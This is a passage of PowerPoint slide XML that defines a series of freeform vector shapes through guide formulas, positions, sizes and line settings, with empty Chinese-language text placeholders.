                <a:gd name="T5" fmla="*/ 1 h 1796"/>
                <a:gd name="T6" fmla="*/ 2 w 2571"/>
                <a:gd name="T7" fmla="*/ 0 h 1796"/>
                <a:gd name="T8" fmla="*/ 6 w 2571"/>
                <a:gd name="T9" fmla="*/ 0 h 1796"/>
                <a:gd name="T10" fmla="*/ 9 w 2571"/>
                <a:gd name="T11" fmla="*/ 0 h 1796"/>
                <a:gd name="T12" fmla="*/ 10 w 2571"/>
                <a:gd name="T13" fmla="*/ 1 h 1796"/>
                <a:gd name="T14" fmla="*/ 11 w 2571"/>
                <a:gd name="T15" fmla="*/ 1 h 1796"/>
                <a:gd name="T16" fmla="*/ 11 w 2571"/>
                <a:gd name="T17" fmla="*/ 4 h 1796"/>
                <a:gd name="T18" fmla="*/ 9 w 2571"/>
                <a:gd name="T19" fmla="*/ 7 h 1796"/>
                <a:gd name="T20" fmla="*/ 10 w 2571"/>
                <a:gd name="T21" fmla="*/ 4 h 1796"/>
                <a:gd name="T22" fmla="*/ 10 w 2571"/>
                <a:gd name="T23" fmla="*/ 1 h 1796"/>
                <a:gd name="T24" fmla="*/ 10 w 2571"/>
                <a:gd name="T25" fmla="*/ 3 h 1796"/>
                <a:gd name="T26" fmla="*/ 9 w 2571"/>
                <a:gd name="T27" fmla="*/ 6 h 1796"/>
                <a:gd name="T28" fmla="*/ 9 w 2571"/>
                <a:gd name="T29" fmla="*/ 7 h 1796"/>
                <a:gd name="T30" fmla="*/ 9 w 2571"/>
                <a:gd name="T31" fmla="*/ 5 h 1796"/>
                <a:gd name="T32" fmla="*/ 10 w 2571"/>
                <a:gd name="T33" fmla="*/ 2 h 1796"/>
                <a:gd name="T34" fmla="*/ 10 w 2571"/>
                <a:gd name="T35" fmla="*/ 1 h 1796"/>
                <a:gd name="T36" fmla="*/ 9 w 2571"/>
                <a:gd name="T37" fmla="*/ 1 h 1796"/>
                <a:gd name="T38" fmla="*/ 8 w 2571"/>
                <a:gd name="T39" fmla="*/ 0 h 1796"/>
                <a:gd name="T40" fmla="*/ 6 w 2571"/>
                <a:gd name="T41" fmla="*/ 0 h 1796"/>
                <a:gd name="T42" fmla="*/ 3 w 2571"/>
                <a:gd name="T43" fmla="*/ 0 h 1796"/>
                <a:gd name="T44" fmla="*/ 0 w 2571"/>
                <a:gd name="T45" fmla="*/ 1 h 1796"/>
                <a:gd name="T46" fmla="*/ 0 w 2571"/>
                <a:gd name="T47" fmla="*/ 1 h 1796"/>
                <a:gd name="T48" fmla="*/ 1 w 2571"/>
                <a:gd name="T49" fmla="*/ 5 h 1796"/>
                <a:gd name="T50" fmla="*/ 1 w 2571"/>
                <a:gd name="T51" fmla="*/ 5 h 1796"/>
                <a:gd name="T52" fmla="*/ 1 w 2571"/>
                <a:gd name="T53" fmla="*/ 5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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Freeform 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="710" y="3348"/>
              <a:ext cx="800" cy="375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 2400"/>
                <a:gd name="T1" fmla="*/ 1 h 1125"/>
                <a:gd name="T2" fmla="*/ 0 w 2400"/>
                <a:gd name="T3" fmla="*/ 1 h 1125"/>
                <a:gd name="T4" fmla="*/ 1 w 2400"/>
                <a:gd name="T5" fmla="*/ 3 h 1125"/>
                <a:gd name="T6" fmla="*/ 1 w 2400"/>
                <a:gd name="T7" fmla="*/ 4 h 1125"/>
                <a:gd name="T8" fmla="*/ 3 w 2400"/>
                <a:gd name="T9" fmla="*/ 4 h 1125"/>
                <a:gd name="T10" fmla="*/ 6 w 2400"/>
                <a:gd name="T11" fmla="*/ 4 h 1125"/>
                <a:gd name="T12" fmla="*/ 7 w 2400"/>
                <a:gd name="T13" fmla="*/ 4 h 1125"/>
                <a:gd name="T14" fmla="*/ 8 w 2400"/>
                <a:gd name="T15" fmla="*/ 2 h 1125"/>
                <a:gd name="T16" fmla="*/ 8 w 2400"/>
                <a:gd name="T17" fmla="*/ 4 h 1125"/>
                <a:gd name="T18" fmla="*/ 8 w 2400"/>
                <a:gd name="T19" fmla="*/ 4 h 1125"/>
                <a:gd name="T20" fmla="*/ 9 w 2400"/>
                <a:gd name="T21" fmla="*/ 4 h 1125"/>
                <a:gd name="T22" fmla="*/ 10 w 2400"/>
                <a:gd name="T23" fmla="*/ 1 h 1125"/>
                <a:gd name="T24" fmla="*/ 9 w 2400"/>
                <a:gd name="T25" fmla="*/ 0 h 1125"/>
                <a:gd name="T26" fmla="*/ 9 w 2400"/>
                <a:gd name="T27" fmla="*/ 0 h 1125"/>
                <a:gd name="T28" fmla="*/ 10 w 2400"/>
                <a:gd name="T29" fmla="*/ 1 h 1125"/>
                <a:gd name="T30" fmla="*/ 9 w 2400"/>
                <a:gd name="T31" fmla="*/ 4 h 1125"/>
                <a:gd name="T32" fmla="*/ 9 w 2400"/>
                <a:gd name="T33" fmla="*/ 4 h 1125"/>
                <a:gd name="T34" fmla="*/ 8 w 2400"/>
                <a:gd name="T35" fmla="*/ 5 h 1125"/>
                <a:gd name="T36" fmla="*/ 8 w 2400"/>
                <a:gd name="T37" fmla="*/ 4 h 1125"/>
                <a:gd name="T38" fmla="*/ 7 w 2400"/>
                <a:gd name="T39" fmla="*/ 4 h 1125"/>
                <a:gd name="T40" fmla="*/ 7 w 2400"/>
                <a:gd name="T41" fmla="*/ 4 h 1125"/>
                <a:gd name="T42" fmla="*/ 6 w 2400"/>
                <a:gd name="T43" fmla="*/ 4 h 1125"/>
                <a:gd name="T44" fmla="*/ 3 w 2400"/>
                <a:gd name="T45" fmla="*/ 4 h 1125"/>
                <a:gd name="T46" fmla="*/ 2 w 2400"/>
                <a:gd name="T47" fmla="*/ 4 h 1125"/>
                <a:gd name="T48" fmla="*/ 1 w 2400"/>
                <a:gd name="T49" fmla="*/ 4 h 1125"/>
                <a:gd name="T50" fmla="*/ 0 w 2400"/>
                <a:gd name="T51" fmla="*/ 3 h 1125"/>
                <a:gd name="T52" fmla="*/ 0 w 2400"/>
                <a:gd name="T53" fmla="*/ 1 h 1125"/>
                <a:gd name="T54" fmla="*/ 0 w 2400"/>
                <a:gd name="T55" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1098" name="Freeform 71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="787" y="3660"/>
              <a:ext cx="132" cy="77"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 396"/>
                <a:gd name="T1" fmla="*/ 1 h 232"/>
                <a:gd name="T2" fmla="*/ 0 w 396"/>
                <a:gd name="T3" fmla="*/ 1 h 232"/>
                <a:gd name="T4" fmla="*/ 1 w 396"/>
                <a:gd name="T5" fmla="*/ 1 h 232"/>
                <a:gd name="T6" fmla="*/ 2 w 396"/>
                <a:gd name="T7" fmla="*/ 0 h 232"/>
                <a:gd name="T8" fmla="*/ 2 w 396"/>
                <a:gd name="T9" fmla="*/ 0 h 232"/>
                <a:gd name="T10" fmla="*/ 1 w 396"/>
                <a:gd name="T11" fmla="*/ 1 h 232"/>
                <a:gd name="T12" fmla="*/ 1 w 396"/>
                <a:gd name="T13" fmla="*/ 1 h 232"/>
                <a:gd name="T14" fmla="*/ 0 w 396"/>
                <a:gd name="T15" fmla="*/ 1 h 232"/>
                <a:gd name="T16" fmla="*/ 0 w 396"/>
                <a:gd name="T17" fmla="*/ 1 h 232"/>
                <a:gd name="T18" fmla="*/ 0 w 396"/>
                <a:gd name="T19" fmla="*/ 1 h 232"/>
                <a:gd name="T20" fmla="*/ 0 w 396"/>
                <a:gd name="T21" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1099" name="Freeform 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="928" y="3687"/>
              <a:ext cx="476" cy="67"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1427"/>
                <a:gd name="T1" fmla="*/ 1 h 201"/>
                <a:gd name="T2" fmla="*/ 6 w 1427"/>
                <a:gd name="T3" fmla="*/ 1 h 201"/>
                <a:gd name="T4" fmla="*/ 6 w 1427"/>
                <a:gd name="T5" fmla="*/ 1 h 201"/>
                <a:gd name="T6" fmla="*/ 5 w 1427"/>
                <a:gd name="T7" fmla="*/ 0 h 201"/>
                <a:gd name="T8" fmla="*/ 4 w 1427"/>
                <a:gd name="T9" fmla="*/ 0 h 201"/>
                <a:gd name="T10" fmla="*/ 4 w 1427"/>
                <a:gd name="T11" fmla="*/ 0 h 201"/>
                <a:gd name="T12" fmla="*/ 2 w 1427"/>
                <a:gd name="T13" fmla="*/ 0 h 201"/>
                <a:gd name="T14" fmla="*/ 0 w 1427"/>
                <a:gd name="T15" fmla="*/ 1 h 201"/>
                <a:gd name="T16" fmla="*/ 0 w 1427"/>
                <a:gd name="T17" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1100" name="Freeform 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="623" y="3814"/>
              <a:ext cx="567" cy="65"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1701"/>
                <a:gd name="T1" fmla="*/ 0 h 194"/>
                <a:gd name="T2" fmla="*/ 0 w 1701"/>
                <a:gd name="T3" fmla="*/ 0 h 194"/>
                <a:gd name="T4" fmla="*/ 1 w 1701"/>
                <a:gd name="T5" fmla="*/ 0 h 194"/>
                <a:gd name="T6" fmla="*/ 1 w 1701"/>
                <a:gd name="T7" fmla="*/ 0 h 194"/>
                <a:gd name="T8" fmla="*/ 2 w 1701"/>
                <a:gd name="T9" fmla="*/ 0 h 194"/>
                <a:gd name="T10" fmla="*/ 2 w 1701"/>
                <a:gd name="T11" fmla="*/ 0 h 194"/>
                <a:gd name="T12" fmla="*/ 3 w 1701"/>
                <a:gd name="T13" fmla="*/ 0 h 194"/>
                <a:gd name="T14" fmla="*/ 3 w 1701"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 4 w 1701"/>
                <a:gd name="T17" fmla="*/ 0 h 194"/>
                <a:gd name="T18" fmla="*/ 4 w 1701"/>
                <a:gd name="T19" fmla="*/ 0 h 194"/>
                <a:gd name="T20" fmla="*/ 4 w 1701"/>
                <a:gd name="T21" fmla="*/ 0 h 194"/>
                <a:gd name="T22" fmla="*/ 5 w 1701"/>
                <a:gd name="T23" fmla="*/ 0 h 194"/>
                <a:gd name="T24" fmla="*/ 5 w 1701"/>
                <a:gd name="T25" fmla="*/ 0 h 194"/>
                <a:gd name="T26" fmla="*/ 6 w 1701"/>
                <a:gd name="T27" fmla="*/ 0 h 194"/>
                <a:gd name="T28" fmla="*/ 7 w 1701"/>
                <a:gd name="T29" fmla="*/ 0 h 194"/>
                <a:gd name="T30" fmla="*/ 7 w 1701"/>
                <a:gd name="T31" fmla="*/ 1 h 194"/>
                <a:gd name="T32" fmla="*/ 7 w 1701"/>
                <a:gd name="T33" fmla="*/ 1 h 194"/>
                <a:gd name="T34" fmla="*/ 6 w 1701"/>
                <a:gd name="T35" fmla="*/ 1 h 194"/>
                <a:gd name="T36" fmla="*/ 6 w 1701"/>
                <a:gd name="T37" fmla="*/ 1 h 194"/>
                <a:gd name="T38" fmla="*/ 5 w 1701"/>
                <a:gd name="T39" fmla="*/ 1 h 194"/>
                <a:gd name="T40" fmla="*/ 5 w 1701"/>
                <a:gd name="T41" fmla="*/ 0 h 194"/>
                <a:gd name="T42" fmla="*/ 4 w 1701"/>
                <a:gd name="T43" fmla="*/ 0 h 194"/>
                <a:gd name="T44" fmla="*/ 4 w 1701"/>
                <a:gd name="T45" fmla="*/ 1 h 194"/>
                <a:gd name="T46" fmla="*/ 4 w 1701"/>
                <a:gd name="T47" fmla="*/ 1 h 194"/>
                <a:gd name="T48" fmla="*/ 4 w 1701"/>
                <a:gd name="T49" fmla="*/ 0 h 194"/>
                <a:gd name="T50" fmla="*/ 3 w 1701"/>
                <a:gd name="T51" fmla="*/ 0 h 194"/>
                <a:gd name="T52" fmla="*/ 3 w 1701"/>
                <a:gd name="T53" fmla="*/ 1 h 194"/>
                <a:gd name="T54" fmla="*/ 2 w 1701"/>
                <a:gd name="T55" fmla="*/ 1 h 194"/>
                <a:gd name="T56" fmla="*/ 2 w 1701"/>
                <a:gd name="T57" fmla="*/ 0 h 194"/>
                <a:gd name="T58" fmla="*/ 2 w 1701"/>
                <a:gd name="T59" fmla="*/ 0 h 194"/>
                <a:gd name="T60" fmla="*/ 1 w 1701"/>
                <a:gd name="T61" fmla="*/ 1 h 194"/>
                <a:gd name="T62" fmla="*/ 1 w 1701"/>
                <a:gd name="T63" fmla="*/ 1 h 194"/>
                <a:gd name="T64" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1101" name="Freeform 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="942" y="3793"/>
              <a:ext cx="507" cy="57"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1521"/>
                <a:gd name="T1" fmla="*/ 0 h 173"/>
                <a:gd name="T2" fmla="*/ 0 w 1521"/>
                <a:gd name="T3" fmla="*/ 0 h 173"/>
                <a:gd name="T4" fmla="*/ 1 w 1521"/>
                <a:gd name="T5" fmla="*/ 0 h 173"/>
                <a:gd name="T6" fmla="*/ 1 w 1521"/>
                <a:gd name="T7" fmla="*/ 0 h 173"/>
                <a:gd name="T8" fmla="*/ 1 w 1521"/>
                <a:gd name="T9" fmla="*/ 0 h 173"/>
                <a:gd name="T10" fmla="*/ 2 w 1521"/>
                <a:gd name="T11" fmla="*/ 0 h 173"/>
                <a:gd name="T12" fmla="*/ 2 w 1521"/>
                <a:gd name="T13" fmla="*/ 0 h 173"/>
                <a:gd name="T14" fmla="*/ 3 w 1521"/>
                <a:gd name="T15" fmla="*/ 0 h 173"/>
                <a:gd name="T16" fmla="*/ 3 w 1521"/>
                <a:gd name="T17" fmla="*/ 0 h 173"/>
                <a:gd name="T18" fmla="*/ 4 w 1521"/>
                <a:gd name="T19" fmla="*/ 0 h 173"/>
                <a:gd name="T20" fmla="*/ 4 w 1521"/>
                <a:gd name="T21" fmla="*/ 0 h 173"/>
                <a:gd name="T22" fmla="*/ 5 w 1521"/>
                <a:gd name="T23" fmla="*/ 0 h 173"/>
                <a:gd name="T24" fmla="*/ 5 w 1521"/>
                <a:gd name="T25" fmla="*/ 0 h 173"/>
                <a:gd name="T26" fmla="*/ 5 w 1521"/>
                <a:gd name="T27" fmla="*/ 0 h 173"/>
                <a:gd name="T28" fmla="*/ 6 w 1521"/>
                <a:gd name="T29" fmla="*/ 0 h 173"/>
                <a:gd name="T30" fmla="*/ 6 w 1521"/>
                <a:gd name="T31" fmla="*/ 1 h 173"/>
                <a:gd name="T32" fmla="*/ 6 w 1521"/>
                <a:gd name="T33" fmla="*/ 1 h 173"/>
                <a:gd name="T34" fmla="*/ 6 w 1521"/>
                <a:gd name="T35" fmla="*/ 0 h 173"/>
                <a:gd name="T36" fmla="*/ 5 w 1521"/>
                <a:gd name="T37" fmla="*/ 0 h 173"/>
                <a:gd name="T38" fmla="*/ 5 w 1521"/>
                <a:gd name="T39" fmla="*/ 1 h 173"/>
                <a:gd name="T40" fmla="*/ 4 w 1521"/>
                <a:gd name="T41" fmla="*/ 0 h 173"/>
                <a:gd name="T42" fmla="*/ 4 w 1521"/>
                <a:gd name="T43" fmla="*/ 0 h 173"/>
                <a:gd name="T44" fmla="*/ 4 w 1521"/>
                <a:gd name="T45" fmla="*/ 1 h 173"/>
                <a:gd name="T46" fmla="*/ 3 w 1521"/>
                <a:gd name="T47" fmla="*/ 1 h 173"/>
                <a:gd name="T48" fmla="*/ 3 w 1521"/>
                <a:gd name="T49" fmla="*/ 0 h 173"/>
                <a:gd name="T50" fmla="*/ 3 w 1521"/>
                <a:gd name="T51" fmla="*/ 0 h 173"/>
                <a:gd name="T52" fmla="*/ 3 w 1521"/>
                <a:gd name="T53" fmla="*/ 1 h 173"/>
                <a:gd name="T54" fmla="*/ 2 w 1521"/>
                <a:gd name="T55" fmla="*/ 1 h 173"/>
                <a:gd name="T56" fmla="*/ 2 w 1521"/>
                <a:gd name="T57" fmla="*/ 0 h 173"/>
                <a:gd name="T58" fmla="*/ 1 w 1521"/>
                <a:gd name="T59" fmla="*/ 0 h 173"/>
                <a:gd name="T60" fmla="*/ 1 w 1521"/>
                <a:gd name="T61" fmla="*/ 1 h 173"/>
                <a:gd name="T62" fmla="*/ 1 w 1521"/>
                <a:gd name="T63" fmla="*/ 0 h 173"/>
                <a:gd name="T64" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Freeform 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="798" y="3748"/>
              <a:ext cx="507" cy="57"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1521"/>
                <a:gd name="T1" fmla="*/ 0 h 172"/>
                <a:gd name="T2" fmla="*/ 0 w 1521"/>
                <a:gd name="T3" fmla="*/ 0 h 172"/>
                <a:gd name="T4" fmla="*/ 1 w 1521"/>
                <a:gd name="T5" fmla="*/ 0 h 172"/>
                <a:gd name="T6" fmla="*/ 1 w 1521"/>
                <a:gd name="T7" fmla="*/ 0 h 172"/>
                <a:gd name="T8" fmla="*/ 1 w 1521"/>
                <a:gd name="T9" fmla="*/ 0 h 172"/>
                <a:gd name="T10" fmla="*/ 2 w 1521"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 2 w 1521"/>
                <a:gd name="T13" fmla="*/ 0 h 172"/>
                <a:gd name="T14" fmla="*/ 3 w 1521"/>
                <a:gd name="T15" fmla="*/ 0 h 172"/>
                <a:gd name="T16" fmla="*/ 3 w 1521"/>
                <a:gd name="T17" fmla="*/ 0 h 172"/>
                <a:gd name="T18" fmla="*/ 4 w 1521"/>
                <a:gd name="T19" fmla="*/ 0 h 172"/>
                <a:gd name="T20" fmla="*/ 4 w 1521"/>
                <a:gd name="T21" fmla="*/ 0 h 172"/>
                <a:gd name="T22" fmla="*/ 5 w 1521"/>
                <a:gd name="T23" fmla="*/ 0 h 172"/>
                <a:gd name="T24" fmla="*/ 5 w 1521"/>
                <a:gd name="T25" fmla="*/ 0 h 172"/>
                <a:gd name="T26" fmla="*/ 5 w 1521"/>
                <a:gd name="T27" fmla="*/ 0 h 172"/>
                <a:gd name="T28" fmla="*/ 6 w 1521"/>
                <a:gd name="T29" fmla="*/ 0 h 172"/>
                <a:gd name="T30" fmla="*/ 6 w 1521"/>
                <a:gd name="T31" fmla="*/ 1 h 172"/>
                <a:gd name="T32" fmla="*/ 6 w 1521"/>
                <a:gd name="T33" fmla="*/ 1 h 172"/>
                <a:gd name="T34" fmla="*/ 6 w 1521"/>
                <a:gd name="T35" fmla="*/ 0 h 172"/>
                <a:gd name="T36" fmla="*/ 5 w 1521"/>
                <a:gd name="T37" fmla="*/ 0 h 172"/>
                <a:gd name="T38" fmla="*/ 5 w 1521"/>
                <a:gd name="T39" fmla="*/ 1 h 172"/>
                <a:gd name="T40" fmla="*/ 4 w 1521"/>
                <a:gd name="T41" fmla="*/ 0 h 172"/>
                <a:gd name="T42" fmla="*/ 4 w 1521"/>
                <a:gd name="T43" fmla="*/ 0 h 172"/>
                <a:gd name="T44" fmla="*/ 4 w 1521"/>
                <a:gd name="T45" fmla="*/ 1 h 172"/>
                <a:gd name="T46" fmla="*/ 3 w 1521"/>
                <a:gd name="T47" fmla="*/ 1 h 172"/>
                <a:gd name="T48" fmla="*/ 3 w 1521"/>
                <a:gd name="T49" fmla="*/ 0 h 172"/>
                <a:gd name="T50" fmla="*/ 3 w 1521"/>
                <a:gd name="T51" fmla="*/ 0 h 172"/>
                <a:gd name="T52" fmla="*/ 2 w 1521"/>
                <a:gd name="T53" fmla="*/ 1 h 172"/>
                <a:gd name="T54" fmla="*/ 2 w 1521"/>
                <a:gd name="T55" fmla="*/ 1 h 172"/>
                <a:gd name="T56" fmla="*/ 2 w 1521"/>
                <a:gd name="T57" fmla="*/ 0 h 172"/>
                <a:gd name="T58" fmla="*/ 1 w 1521"/>
                <a:gd name="T59" fmla="*/ 0 h 172"/>
                <a:gd name="T60" fmla="*/ 1 w 1521"/>
                <a:gd name="T61" fmla="*/ 1 h 172"/>
                <a:gd name="T62" fmla="*/ 1 w 1521"/>
                <a:gd name="T63" fmla="*/ 0 h 172"/>
                <a:gd name="T64" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1103" name="Freeform 76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="846" y="3194"/>
              <a:ext cx="114" cy="43"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 342"/>
                <a:gd name="T1" fmla="*/ 0 h 131"/>
                <a:gd name="T2" fmla="*/ 0 w 342"/>
                <a:gd name="T3" fmla="*/ 1 h 131"/>
                <a:gd name="T4" fmla="*/ 1 w 342"/>
                <a:gd name="T5" fmla="*/ 0 h 131"/>
                <a:gd name="T6" fmla="*/ 1 w 342"/>
                <a:gd name="T7" fmla="*/ 0 h 131"/>
                <a:gd name="T8" fmla="*/ 1 w 342"/>
                <a:gd name="T9" fmla="*/ 0 h 131"/>
                <a:gd name="T10" fmla="*/ 1 w 342"/>
                <a:gd name="T11" fmla="*/ 0 h 131"/>
                <a:gd name="T12" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1104" name="Freeform 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1144" y="3197"/>
              <a:ext cx="131" cy="50"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 393"/>
                <a:gd name="T1" fmla="*/ 0 h 149"/>
                <a:gd name="T2" fmla="*/ 0 w 393"/>
                <a:gd name="T3" fmla="*/ 0 h 149"/>
                <a:gd name="T4" fmla="*/ 0 w 393"/>
                <a:gd name="T5" fmla="*/ 0 h 149"/>
                <a:gd name="T6" fmla="*/ 1 w 393"/>
                <a:gd name="T7" fmla="*/ 0 h 149"/>
                <a:gd name="T8" fmla="*/ 2 w 393"/>
                <a:gd name="T9" fmla="*/ 1 h 149"/>
                <a:gd name="T10" fmla="*/ 2 w 393"/>
                <a:gd name="T11" fmla="*/ 1 h 149"/>
                <a:gd name="T12" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1105" name="Freeform 78"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1134" y="3236"/>
              <a:ext cx="144" cy="61"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 434"/>
                <a:gd name="T1" fmla="*/ 1 h 185"/>
                <a:gd name="T2" fmla="*/ 2 w 434"/>
                <a:gd name="T3" fmla="*/ 0 h 185"/>
                <a:gd name="T4" fmla="*/ 1 w 434"/>
                <a:gd name="T5" fmla="*/ 0 h 185"/>
                <a:gd name="T6" fmla="*/ 1 w 434"/>
                <a:gd name="T7" fmla="*/ 0 h 185"/>
                <a:gd name="T8" fmla="*/ 0 w 434"/>
                <a:gd name="T9" fmla="*/ 0 h 185"/>
                <a:gd name="T10" fmla="*/ 0 w 434"/>
                <a:gd name="T11" fmla="*/ 0 h 185"/>
                <a:gd name="T12" fmla="*/ 1 w 434"/>
                <a:gd name="T13" fmla="*/ 0 h 185"/>
                <a:gd name="T14" fmla="*/ 1 w 434"/>
                <a:gd name="T15" fmla="*/ 0 h 185"/>
                <a:gd name="T16" fmla="*/ 2 w 434"/>
                <a:gd name="T17" fmla="*/ 0 h 185"/>
                <a:gd name="T18" fmla="*/ 2 w 434"/>
                <a:gd name="T19" fmla="*/ 0 h 185"/>
                <a:gd name="T20" fmla="*/ 2 w 434"/>
                <a:gd name="T21" fmla="*/ 1 h 185"/>
                <a:gd name="T22" fmla="*/ 2 w 434"/>
                <a:gd name="T23" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1106" name="Freeform 79"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1123" y="3092"/>
              <a:ext cx="179" cy="163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 538"/>
                <a:gd name="T1" fmla="*/ 2 h 489"/>
                <a:gd name="T2" fmla="*/ 2 w 538"/>
                <a:gd name="T3" fmla="*/ 2 h 489"/>
                <a:gd name="T4" fmla="*/ 1 w 538"/>
                <a:gd name="T5" fmla="*/ 1 h 489"/>
                <a:gd name="T6" fmla="*/ 0 w 538"/>
                <a:gd name="T7" fmla="*/ 1 h 489"/>
                <a:gd name="T8" fmla="*/ 0 w 538"/>
                <a:gd name="T9" fmla="*/ 2 h 489"/>
                <a:gd name="T10" fmla="*/ 0 w 538"/>
                <a:gd name="T11" fmla="*/ 1 h 489"/>
                <a:gd name="T12" fmla="*/ 0 w 538"/>
                <a:gd name="T13" fmla="*/ 1 h 489"/>
                <a:gd name="T14" fmla="*/ 1 w 538"/>
                <a:gd name="T15" fmla="*/ 0 h 489"/>
                <a:gd name="T16" fmla="*/ 1 w 538"/>
                <a:gd name="T17" fmla="*/ 0 h 489"/>
                <a:gd name="T18" fmla="*/ 1 w 538"/>
                <a:gd name="T19" fmla="*/ 0 h 489"/>
                <a:gd name="T20" fmla="*/ 1 w 538"/>
                <a:gd name="T21" fmla="*/ 0 h 489"/>
                <a:gd name="T22" fmla="*/ 2 w 538"/>
                <a:gd name="T23" fmla="*/ 0 h 489"/>
                <a:gd name="T24" fmla="*/ 2 w 538"/>
                <a:gd name="T25" fmla="*/ 1 h 489"/>
